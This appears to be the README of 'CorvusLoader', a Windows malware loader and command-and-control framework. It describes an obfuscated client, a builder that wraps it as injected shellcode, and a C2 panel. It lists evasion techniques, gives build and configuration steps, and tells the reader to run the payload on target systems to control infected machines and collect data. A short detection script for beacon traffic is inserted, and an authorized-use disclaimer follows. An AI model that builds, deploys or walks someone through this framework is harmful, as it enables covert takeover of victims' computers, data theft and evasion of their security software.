A Windows malware framework for command & control, process injection, and client management. Designed for idk people ig.
CorvusLoader is a malware distribution and control infrastructure consisting of three main components:
- Client - Obfuscated Windows agent that executes on target systems
- Builder - Automated compilation and obfuscation pipeline
- Server (C2 Panel) - Central command & control and client management interface
The framework provides endpoint deployment, task distribution, real-time monitoring, and command execution across distributed infected systems.
- String Encryption - Garble-based obfuscation of code strings
- Process Injection - Shellcode injection into legitimate processes
- Syscall Hashing - Direct syscall execution avoiding hooked APIs
- Path Obfuscation - Source code paths removed from binaries
- Automatic Beaconing - Periodic client check-ins to C2
- Geolocation - Automatic IP and ASN detection
- System Fingerprinting - CPU, GPU, antivirus, Windows version detection
- Hardware ID - Unique cross-platform HWID for client tracking
- Multi-endpoint Support - Failover support for multiple C2 servers
- Flexible Commands - Execute arbitrary commands on clients
- Targeted Filtering - Deploy to specific systems by country, CPU, GPU, OS
- Task Tracking - Monitor execution status and completion
- Result Collection - Gather command output and exfiltrated data
- Batch Operations - Target multiple systems simultaneously
- Intuitive Dashboard - Real-time client status visualization
- Admin Panel - Secure authentication and session management
- Client Profiles - Detailed system information per infected machine
- Task Management - Create and distribute commands
- Activity Logs - Complete audit trail of operations
### 1. Client (`client/`)
Infected endpoint agent that:
- Establishes C2 communication
- Collects system information
- Receives and executes commands
- Reports results back to server
Key files:
- client/client/main.go - Client entry and beacon logic
- client/client/commands.go - Command execution handlers
- client/injector/main.go - Process injection engine
Features:
- 15-second beacon interval (configurable)
- Multi-endpoint failover
- System-wide execution mutex (single instance)
### 2. Builder (`client/builder/`)
Automated compilation and obfuscation pipeline:
- Compiles client with garble encryption
- Converts binary to position-independent shellcode
- Embeds shellcode in injector binary
- Outputs final deployable payload
### 3. C2 Server (`server/`)
Central command & control infrastructure:
- Receives client beacons via HTTP
- Manages task distribution
- Maintains client database (SQLite)
- Web-based administration interface
Setup:
```bash
cd server
go build .
```
Access: http://localhost:8080 (or remote IP address on network)

Edit `client/client/main.go`:
```go
endpoints := []string{"http://your-c2-server:8080/"}
```
(Use your C2 server's IP address or domain name)
```bash
cd client/builder
go build .
builder.exe
```
Output: `build/corvus.exe`
```bash
cd server
go build .
```
execute panel file

`localhost:8080/register` (or your server IP on network)

Register admin account at `http://your-server-ip:8080/register`
### 4. Deploy Payload
Execute `corvus.exe` on target systems. Clients will automatically beacon to C2 panel.
### 5. Manage Clients
Use web interface to:
- View connected clients
- Create and distribute tasks
- Monitor execution
- Collect results
## Security Features
### Obfuscation & Evasion
| Feature | Method | Benefit |
|---------|--------|---------|
| String Encryption | Garble | Hides command strings |
| Code Obfuscation | Garble | Confuses reverse engineering |
| Syscall Hashing | Direct syscalls | Evades API hooks |
| Process Injection | Process hollowing | Executes in clean context |
| Path Removal | Trimpath compilation | Removes source paths |
### Client Tracking
- **HWID** - Unique per system (hostname + IP + ASN)
- **Geolocation** - IP lookup via ip-api.com
- **Fingerprinting** - CPU, GPU, antivirus detection
- **Uptime** - System uptime monitoring
- **Status** - Online/offline tracking
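
For defenders, the fixed beacon interval and the ip-api.com lookup listed above are both visible in web-proxy logs. The following is an added detection example, not part of the CorvusLoader code: it flags source hosts whose requests to one destination arrive at a near-constant interval and records whether the same host also queried ip-api.com. The log format, host names, thresholds and sample lines are constructed assumptions.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed proxy-log lines: "<epoch_seconds> <src_host> <dst_host:port> <path>"
SAMPLE_LOG = """\
1000 ws-014 203.0.113.7:8080 /
1002 ws-014 ip-api.com:80 /json
1015 ws-014 203.0.113.7:8080 /
1021 ws-022 intranet.example:443 /wiki
1030 ws-014 203.0.113.7:8080 /
1045 ws-014 203.0.113.7:8080 /
1060 ws-014 203.0.113.7:8080 /
1075 ws-014 203.0.113.7:8080 /
1190 ws-022 intranet.example:443 /wiki/page
1204 ws-022 intranet.example:443 /search
1600 ws-022 intranet.example:443 /wiki
"""

GEO_LOOKUP_HOST = "ip-api.com"  # geolocation service named on this page


def find_beacons(log_text, min_events=5, max_jitter=0.2):
    """Return findings for (src, dst) pairs with near-constant request spacing.

    max_jitter is the allowed coefficient of variation (stdev / mean) of the
    gaps between consecutive requests; both thresholds are assumptions to tune.
    """
    times = defaultdict(list)
    geo_sources = set()
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4 or not parts[0].isdigit():
            continue  # skip malformed lines
        ts, src, dst, _path = parts
        if dst.split(":")[0] == GEO_LOOKUP_HOST:
            geo_sources.add(src)  # corroborating signal, not a beacon itself
            continue
        times[(src, dst)].append(int(ts))

    findings = []
    for (src, dst), stamps in sorted(times.items()):
        stamps = sorted(stamps)
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        if len(gaps) < max(min_events - 1, 1):
            continue  # too few requests to judge periodicity
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            findings.append({"src": src, "dst": dst, "interval": avg,
                             "events": len(stamps), "geo_lookup": src in geo_sources})
    return findings
```

Because the interval is configurable, the check keys on regularity of spacing rather than on the 15-second default; widen `max_jitter` if agents in your environment randomize their check-ins.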
### Task Management
- **Selective Targeting** - Filter by country, CPU, GPU, OS, HWID
- **Execution Limits** - Control task distribution counts
- **Status Tracking** - pending/executing/completed states
- **Unique IDs** - Task correlation and logging
## Documentation
- [Builder README](client/builder/README.md) - Build configuration and compilation
- [Injector README](client/injector/README.md) - Injection engine and evasion techniques
- [Server README](server/README.md) - C2 server setup and API documentation
- [Client Code](client/client/) - Agent implementation details
## Performance
Designed for enterprise-scale operations:
- **Database** - 100 concurrent connections, WAL mode
- **Concurrent Clients** - 1000+ simultaneous connections
- **Task Distribution** - Millisecond response times
- **Memory Footprint** - Minimal binary size with garble
- **Network** - Efficient JSON serialization
## Legal & Ethical
### Authorized Use Only
This framework is designed exclusively for:
- Authorized penetration testing
- Red team security assessments
- Defensive security research
- Licensed security professionals
## Troubleshooting
### Build Issues
See [Builder Documentation](client/builder/README.md#troubleshooting)
### Injection Failures
See [Injector Documentation](client/injector/README.md#troubleshooting)
### Server Problems
See [Server Documentation](server/README.md#troubleshooting)
## Project Structure
```
CorvusLoader/
├── client/              # Client components
│   ├── builder/         # Build automation
│   ├── client/          # Agent code
│   └── injector/        # Injection engine
├── server/              # C2 panel server
│   ├── main.go
│   ├── database/
│   ├── handlers/
│   ├── models/
│   ├── templates/
│   └── README.md
└── README.md            # This file
```
## Development
### Building from Source
```bash
# Install Go 1.21+
# Install garble: go install github.com/burrowers/garble@latest
# Clone repository
cd CorvusLoader/client/builder
go build .
```
Deploy in isolated lab environment with proper containment and monitoring.
This project is provided for educational and authorized testing purposes only. The author assumes no liability for misuse or damage caused by this software. Users are responsible for ensuring compliance with applicable laws and authorization requirements.